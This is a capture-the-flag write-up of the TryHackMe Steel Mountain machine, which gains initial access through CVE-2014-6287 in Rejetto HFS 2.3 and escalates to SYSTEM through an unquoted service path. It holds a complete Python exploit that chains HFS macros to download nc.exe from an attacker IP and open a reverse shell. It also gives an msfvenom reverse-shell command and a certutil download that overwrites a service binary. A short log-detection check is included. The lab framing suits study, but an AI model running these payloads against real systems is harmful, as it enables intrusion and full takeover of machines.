Steel Mountain (THM)

TryHackMe Steel Mountain Write-Up

topics: web application security, PowerShell, Windows privilege escalation, public exploits, file transferring

  1. Enumeration

  2. Exploitation (Initial Foothold)

  3. System Privilege Escalation

new tools: winPEAS, PowerShell

Enumeration

Initial nmap scan: .././autonmap.sh $ip Basic

We have several ports open, including MSRPC, SMB, RDP, and multiple HTTP ports. We enumerate the low-hanging fruit first: the two websites.

The website on port 80 is a default homepage with nothing but an image, while port 8080 displays a more interesting page.

Clicking the Server Information link reveals that the web server is Rejetto HTTP File Server (HFS) 2.3. The 2.3x releases before 2.3c are vulnerable to CVE-2014-6287, a remote command execution bug in the search function, so this installed version is exploitable.

Exploitation (Initial Foothold)

Exploit-DB 39161 explains that we need to host a Windows netcat binary (nc.exe) on an HTTP server for the target to fetch; the same mechanism can make the target download and run any file we choose.

Set the attacker IP and listener port inside the script, start the web server (serving nc.exe on port 80) and the netcat listener, then run python exp.py $ip 8080 twice. The first run makes the target download nc.exe; the second run executes it, which connects the reverse shell back to our listener.
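The mechanism behind CVE-2014-6287 and what the public exploit actually sends, as an added example in Python (not the write-up's exp.py and not Exploit-DB 39161 itself): HFS 2.3x stops scanning the search string at a NUL byte, so %00 followed by macro syntax {.exec|command.} is executed server-side. The attacker address, listener port, the C:\Users\Public staging directory and the Server header line are assumptions; is_macro_injection is a log-side check for the same pattern, and trigger is the only function that touches the network.

```python
"""CVE-2014-6287 (Rejetto HFS 2.3x before 2.3c) request construction and a
log-side check. Added example, not Exploit-DB 39161 and not the write-up's
exp.py; attacker address, port and staging directory are assumptions."""
import re
from typing import List
from urllib.parse import parse_qs, quote, urlparse


def version_vulnerable(server_header: str) -> bool:
    """True for 'HFS 2.3', '2.3a', '2.3b' (the 2.3x releases before 2.3c
    named by the CVE). Older branches are not covered here."""
    m = re.search(r'HFS\s+(\d+\.\d+)([a-z]?)', server_header)
    if not m:
        return False
    return m.group(1) == '2.3' and m.group(2) < 'c'


def macro_path(macro: str) -> str:
    """Request path that smuggles one HFS macro past the search filter.
    findMacroMarker stops at the NUL, so everything after %00 is parsed as
    macro syntax. The body is percent-encoded (pipes, backslashes, spaces,
    quotes); the NUL and the {. .} delimiters must stay raw."""
    return '/?search=%00{.' + quote(macro, safe='') + '.}'


def staged_macros(attacker_ip: str, attacker_port: int,
                  stage_dir: str = r'C:\Users\Public') -> List[str]:
    """The three macros the public exploit chains: save a VBS downloader,
    run it to fetch nc.exe from http://<attacker>/nc.exe (port 80), then
    run nc.exe as a reverse shell. stage_dir is an assumed writable dir."""
    vbs = '\r\n'.join([
        'dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")',
        'dim bStrm: Set bStrm = createobject("Adodb.Stream")',
        f'xHttp.Open "GET", "http://{attacker_ip}/nc.exe", False',
        'xHttp.Send',
        'with bStrm',
        '    .type = 1',
        '    .open',
        '    .write xHttp.responseBody',
        f'    .savetofile "{stage_dir}\\nc.exe", 2',
        'end with',
    ])
    script = stage_dir + r'\script.vbs'
    return [
        f'save|{script}|{vbs}',
        f'exec|wscript.exe //B //NOLOGO {script}',
        f'exec|{stage_dir}\\nc.exe -e cmd.exe {attacker_ip} {attacker_port}',
    ]


def is_macro_injection(request_target: str) -> bool:
    """Detection side: after URL-decoding, a search value containing a NUL
    byte and the macro opener '{.' is an exploitation attempt."""
    query = parse_qs(urlparse(request_target).query, keep_blank_values=True)
    return any('\x00' in v and '{.' in v for v in query.get('search', []))


def trigger(host: str, port: int, macros: List[str], timeout: float = 5.0) -> None:
    """Send each macro to a live HFS instance (network; not exercised here).
    HFS answers the search normally; the command execution is a side effect."""
    import urllib.request
    for m in macros:
        urllib.request.urlopen(f'http://{host}:{port}' + macro_path(m),
                               timeout=timeout).read()


if __name__ == '__main__':
    for m in staged_macros('10.6.18.145', 443):
        print(macro_path(m))
    print(is_macro_injection(macro_path('exec|calc.exe')))   # True
```

Against a live target you would call trigger twice with the staged macros, exactly as the write-up runs exp.py twice: the first pass drops and runs the VBS downloader, and nc.exe is only present for the exec in the second pass. The detection check is the blue-team counterpart: any decoded search parameter carrying a NUL byte plus "{." in HFS access logs is this exploit.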

System Privilege Escalation

I did not see anything that stood out initially, so I decided to run winPEAS. winPEAS returns several potential attack vectors for SYSTEM privileges, but one in particular stands out: an unquoted service path vulnerability.

When a service's executable path contains spaces and is not enclosed in quotes, Windows has to guess where the binary name ends, and it tries each prefix up to a space with .exe appended before it reaches the full path: for C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe it tries C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\IObit\Advanced.exe first. If we can write to one of those directories and the service runs as SYSTEM, a binary planted at that candidate runs with SYSTEM privileges the next time the service starts, so we also need to be able to restart the service (or wait for a reboot if it is auto-start).
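A small triage of unquoted service paths, added here as Python (not from the write-up and not winPEAS code): it parses the CSV form of wmic service get Name,PathName,StartMode /format:csv, flags unquoted paths containing spaces, and lists the paths Windows tries before the real binary, each with the directory that would have to be writable. The sample output is constructed; the hostname STEELMOUNTAIN and the Spooler and VMTools rows are made up as controls.

```python
"""Unquoted service path triage over `wmic service get Name,PathName,StartMode
/format:csv` output. Added example, not from the write-up or winPEAS."""
import csv
import io
import ntpath
import re
from typing import List, Tuple

# Constructed sample in wmic's CSV layout (leading blank line, Node column).
# Rows 2 and 3 are controls that must not be flagged: no spaces, and quoted.
SAMPLE_CSV = r"""
Node,Name,PathName,StartMode
STEELMOUNTAIN,AdvancedSystemCareService9,C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe,Auto
STEELMOUNTAIN,Spooler,C:\Windows\System32\spoolsv.exe,Auto
STEELMOUNTAIN,VMTools,"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",Auto
"""

EXE_RE = re.compile(r'^(.*?\.exe)', re.IGNORECASE)


def service_binary(pathname: str) -> str:
    """Executable part of a service PathName, arguments dropped; a quoted
    path is returned without its quotes."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = EXE_RE.match(p)
    return m.group(1) if m else p.split(' ')[0]


def is_unquoted_with_spaces(pathname: str) -> bool:
    """The precondition for the bug: no surrounding quotes and at least one
    space in the executable path itself (spaces only in arguments don't count)."""
    p = pathname.strip()
    return not p.startswith('"') and ' ' in service_binary(p)


def hijack_candidates(exe_path: str) -> List[str]:
    """Paths CreateProcess tries, in order, before reaching the real binary:
    the text before each space with .exe appended (documented search order).
    A payload at any candidate whose directory is writable wins."""
    return [exe_path[:i] + '.exe' for i, ch in enumerate(exe_path) if ch == ' ']


def find_unquoted_services(wmic_csv: str) -> List[Tuple[str, str, List[str]]]:
    """(service name, binary, candidates) for every vulnerable-looking row.
    QUOTE_NONE keeps the quotes verbatim, because the quote is what we test."""
    findings = []
    reader = csv.reader(io.StringIO(wmic_csv, newline=''), quoting=csv.QUOTE_NONE)
    header = None
    for row in reader:
        if not row:
            continue                      # wmic's leading blank line
        if header is None:
            header = row
            continue
        rec = dict(zip(header, row))
        path = rec.get('PathName', '')
        if is_unquoted_with_spaces(path):
            binary = service_binary(path)
            findings.append((rec['Name'], binary, hijack_candidates(binary)))
    return findings


if __name__ == '__main__':
    for name, binary, cands in find_unquoted_services(SAMPLE_CSV):
        print(f'[!] {name}: {binary}')
        for c in cands:
            # confirm write access on the target with: icacls "<dir>"
            print(f'    tries {c}  (needs write access to {ntpath.dirname(c)})')
```

On the box this lists C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\IObit\Advanced.exe for AdvancedSystemCareService9; the write-up overwrites ASCService.exe itself instead, which relies on write access to the service's own directory rather than on the search order. Checking each listed directory with icacls tells you which option is open.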

Listing C:\Program Files (x86)\IObit\Advanced SystemCare\ shows that the service executable is ASCService.exe, so our reverse shell will take that name.

Create the payload with msfvenom and listen for the shell with nc -nlvp 443:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.18.145 LPORT=443 -f exe -o ASCService.exe

Next, stop the service, optionally back up the original ASCService.exe, download the payload from the attacker's web server over it, and start the service again. Note that overwriting the binary in place only works because our user can write to that directory and can stop and start the service; the textbook unquoted-path abuse instead drops the payload as C:\Program Files (x86)\IObit\Advanced.exe, which Windows tries before the real binary:

sc stop AdvancedSystemCareService9
certutil.exe -f -urlcache http://10.6.18.145/ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

Starting the service runs our payload, which returns a shell as nt authority\system.
